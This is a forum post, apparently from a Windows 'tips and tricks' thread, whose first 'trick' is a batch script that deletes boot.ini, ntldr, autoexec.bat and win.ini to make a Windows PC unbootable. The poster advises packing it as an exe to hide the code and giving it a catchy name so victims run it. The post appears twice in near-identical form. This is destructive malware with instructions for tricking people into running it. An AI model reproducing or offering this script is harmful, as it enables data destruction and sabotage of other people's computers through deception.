edvin_158709
Burning Desire
My one of the main reason to start this thread was to bring by far all my knowledge,tricks and methods to use WINDOWS
that i have learn from the web
from troubleshooting
to maintenance as an Engineer for past one year i have learn many things which i would like to share with u all and please dont say we already know this is for those who dont Know.Many have not exposed to every thing so Known people take it as reference
My post has been all taken from many forum and sites so i don't take any credit rather i owe them
---------- Post added at 09:36 PM ---------- Previous post was at 09:26 PM ----------
Here goes my first one Do this at your own risk
create a batch file of the following command
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
The above batch will make windows un-bootable so when user restart its PC it will go blank no boot loader
more to do is just convert the batch file from a simple tool called bat to exe to hide the code and name it anything catchy so any one would die to run it and your work is done 




---------- Post added at 09:36 PM ---------- Previous post was at 09:26 PM ----------
Here goes my first one Do this at your own risk

create a batch file of the following command
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
The above batch will make windows un-bootable so when user restart its PC it will go blank no boot loader


Last edited: